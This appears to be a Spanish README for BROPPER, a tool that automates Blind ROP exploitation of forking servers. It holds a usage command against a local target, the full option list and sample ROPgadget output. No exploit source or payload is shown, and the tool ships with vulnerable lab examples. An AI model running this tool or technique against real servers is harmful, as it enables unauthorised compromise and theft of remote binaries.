
Una herramienta automática de explotación Blind ROP
Una herramienta python automática de explotación Blind ROP
BROP (Blind ROP) fue una técnica descubierta por Andrew Bittau de Stanford en 2014.
La mayoría de servidores como nginx, Apache, MySQL, realizan un fork y luego se comunican con el cliente. Esto significa que el canary y las direcciones permanecen iguales incluso si hay ASLR y PIE. Así que podemos usar fuerza bruta informada para filtrar información y posteriormente crear un exploit funcional.
Hay 3 ejemplos vulnerables personalizados proporcionados en este repositorio. Puedes ejecutarlos directamente o construir el Dockerfile

BROPPER entonces volcará el binario:

Luego es posible extraer todos los gadgets ROP del binario volcado usando ROPgadget, por ejemplo:
$ ROPgadget --binary dump
Gadgets information
============================================================
0x0000000000001177 : adc al, 0 ; add byte ptr [rax], al ; jmp 0x1020
0x0000000000001157 : adc al, byte ptr [rax] ; add byte ptr [rax], al ; jmp 0x1020
0x0000000000001137 : adc byte ptr [rax], al ; add byte ptr [rax], al ; jmp 0x1020
...
...
...
0x0000000000001192 : xor ch, byte ptr [rdi] ; add byte ptr [rax], al ; push 0x16 ; jmp 0x1020
0x000000000000182e : xor eax, 0x891 ; mov rdi, rax ; call rcx
0x0000000000001861 : xor eax, 0xffffff22 ; mov rdi, rax ; call rcx
Unique gadgets found: 235
Para usar este script:
python3 -m pip install -r requirements.txt
python3 bropper.py -t 127.0.0.1 -p 1337 --wait "Password :" --expected Bad --expected-stop Welcome -o dump
$ python3 bropper.py -h
usage: bropper.py [-h] -t TARGET -p PORT --expected-stop EXPECTED_STOP --expected EXPECTED --wait WAIT -o OUTPUT [--offset OFFSET] [--canary CANARY] [--no-canary] [--rbp RBP] [--rip RIP] [--stop STOP]
[--brop BROP] [--plt PLT] [--strcmp STRCMP] [--elf ELF]
Description message
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
target url
-p PORT, --port PORT target port
--expected-stop EXPECTED_STOP
Expected response for the stop gadget
--expected EXPECTED Expected normal response
--wait WAIT String to wait before sending payload
-o OUTPUT, --output OUTPUT
File to write dumped remote binary
--offset OFFSET set a offset value
--canary CANARY set a canary value
--no-canary Use this argument if there is no stack canary protection
--rbp RBP set rbp address
--rip RIP set rip address
--stop STOP set stop gadget address
--brop BROP set brop gadget address
--plt PLT set plt address
--strcmp STRCMP set strcmp entry value
--elf ELF set elf address
Las pull requests son bienvenidas. Siéntete libre de abrir un issue si deseas añadir otras funcionalidades.